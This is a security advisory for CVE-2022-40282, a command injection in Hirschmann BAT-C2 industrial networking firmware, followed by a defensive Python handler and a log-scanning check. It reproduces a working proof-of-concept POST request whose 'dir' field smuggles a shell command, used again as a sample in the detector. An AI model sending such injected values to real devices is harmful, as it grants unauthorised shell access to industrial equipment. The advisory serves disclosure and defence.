Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

Hirschmann (Belden) BAT-C2 version 8.8.1.0R8 suffers from a remote authenticated command injection vulnerability.

Packet Storm
CyberDanube Security Research 20221124-0
-------------------------------------------------------------------------------
               title| Authenticated Command Injection
             product| Hirschmann (Belden) BAT-C2
  vulnerable version| 8.8.1.0R8
       fixed version| 09.13.01.00R04
          CVE number| CVE-2022-40282
              impact| High
            homepage| https://hirschmann.com/
                    | https://beldensolutions.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"The Technology and Market Leader in Industrial Networking. Hirschmann™
develops innovative solutions, which are geared towards its customers’
requirements in terms of performance, efficiency and investment
reliability."

Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml

Vulnerable versions
-------------------------------------------------------------------------------
Hirschmann BAT-C2 / 8.8.1.0R8

Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection.
It allows an attacker to gain full access to the underlying operating system of
the device with all implications. If such a device is acting as a key device in
an industrial network, or controls various critical equipment via serial ports,
more extensive damage in the corresponding network can be done by an attacker.

Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The command "ping 192.168.1.1" was injected into the system by using the
following POST request:
===============================================================================
POST / HTTP/1.1
Host: 192.168.3.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: https://192.168.3.150
Authorization: Digest username="admin", realm="config", nonce="4b63bb796252d310", uri="/", algorithm=MD5, response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, cnonce="99c14d39557e691d"
Referer: https://192.168.3.150/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/
===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution
-------------------------------------------------------------------------------
Upgrade to firmware version 09.13.01.00R04 or above.

A security bulletin for this vulnerability has been published by the vendor:
https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/

Workaround
-------------------------------------------------------------------------------
None

Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends customers from Hirschmann to upgrade the firmware to the
latest version available. Furthermore, a full security review by professionals
is recommended.

Contact Timeline
-------------------------------------------------------------------------------
2022-08-03: Contacting Hirschmann via [email protected]; Belden contact
            suspects a duplicate. Asked contact for more information.
2022-08-18: Belden representative sent more information for clarification.
            Highlighted differences between PoCs.
2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.
2022-08-30: Asked for an update.
2022-08-31: Vendor stated that he will release another security bulletin for
            this vulnerability.
2022-09-27: Asked for an update.
2022-09-28: Vendor is currently testing the new firmware version and has also
            been assigned a CVE number. Draft of security bulletin was
            also sent by the security contact.
2022-10-12: Asked for an update.
2022-10-13: Belden contact stated that there is no publication date for now as
            another patch must be integrated.
2022-10-28: Security contact informed us that the patch will be released
            within the next two weeks.
2022-11-22: Asked for a status update; Security contact stated that the
            release was delayed due to internal reasons.
2022-11-23: Vendor sent the final version of the security bulletins. The
            release of the new firmware version will be 2022-11-28.
2022-11-24: Vendor informed CyberDanube that the release of the bulletin and
            the firmware was done on 2022-11-23 by the marketing team.
            Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022
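The PoC above works because the dir parameter of the FsCreateDir handler reaches a shell with its metacharacters intact. As an added example, which is neither the BAT-C2 firmware nor CyberDanube's code, the Python below shows how a defender would implement that handler so the directory name never touches a shell, together with a small check that flags the injection pattern in request bodies of the form shown in the advisory. The function names, the on-disk root and the sample bodies are constructed for illustration.

```python
"""Hardened 'create directory' handler plus a request-body check.

Added example; the handler and helper names are hypothetical, not the
device's own API. The sample bodies are constructed (the first mirrors
the advisory's PoC body, the second is a benign request).
"""
import os
import re
import tempfile
from typing import Dict, List
from urllib.parse import parse_qs

# Allowlist for a single directory name: letters, digits, dot, dash and
# underscore only, 1-64 characters, and never '.' or '..'.
_NAME_RE = re.compile(r"^(?!\.{1,2}$)[A-Za-z0-9._-]{1,64}$")

# Characters a POSIX shell would interpret. Their presence in a value that
# is supposed to be a plain directory name is a strong injection indicator.
_SHELL_META = set(";|&`$(){}<>\n'\"\\")


def create_dir_safe(root: str, cwd: str, name: str) -> str:
    """Create root/cwd/name without invoking a shell.

    cwd is the user-supplied working directory (the PoC sends '/'), name is
    the dir parameter. Both are confined to root; a name outside the
    allowlist or a path escaping root raises ValueError instead of running
    anything.
    """
    if not _NAME_RE.match(name):
        raise ValueError("rejected directory name: %r" % name)
    root_abs = os.path.realpath(root)
    # Strip leading slashes so an absolute cwd cannot escape the root.
    target = os.path.realpath(os.path.join(root_abs, cwd.lstrip("/"), name))
    if os.path.commonpath([root_abs, target]) != root_abs:
        raise ValueError("path escapes root: %r" % target)
    os.makedirs(target, exist_ok=False)  # direct syscall, no string interpolation
    return target


def find_injection_attempts(form_body: str) -> List[str]:
    """Return decoded 'dir' values that contain shell metacharacters.

    Intended for scanning logged application/x-www-form-urlencoded bodies;
    parse_qs performs the percent-decoding, so %3B is seen as ';'.
    """
    params = parse_qs(form_body, keep_blank_values=True)
    return [v for v in params.get("dir", []) if _SHELL_META & set(v)]


# Constructed sample request bodies.
SAMPLE_BODIES = [
    "ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/",
    "ajax=FsCreateDir&dir=logs&iehack=&submit=Create&cwd=/",
]


def scan_samples() -> Dict[str, List[str]]:
    """Run the body check over the constructed samples."""
    return {body: find_injection_attempts(body) for body in SAMPLE_BODIES}


def demo(root: str = "") -> Dict[str, str]:
    """Exercise the hardened handler on a benign name, the PoC payload and a
    traversal attempt; returns the outcome per input name."""
    root = root or tempfile.mkdtemp()
    results = {}
    for name in ("logs", "';ping 192.168.1.1;'", "../etc"):
        try:
            created = create_dir_safe(root, "/", name)
            results[name] = "created " + os.path.relpath(created, root)
        except ValueError:
            results[name] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
    print(scan_samples())
```

The design point is that validation is an allowlist on the name and the filesystem call is made directly; no amount of quoting or blocklisting of `;` would be as robust as simply never building a command line from the parameter. The body check is the detection counterpart: run over web-server logs it surfaces the exact pattern from the PoC while ignoring legitimate names.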

Related news

CVE-2022-40282: security-assurance

The web server of Hirschmann BAT-C2 before 09.13.01.00R04 allows authenticated command injection. This allows an authenticated attacker to pass commands to the shell of the system because the dir parameter of the FsCreateDir Ajax function is not sufficiently sanitized. The vendor's ID is BSECV-2022-21.
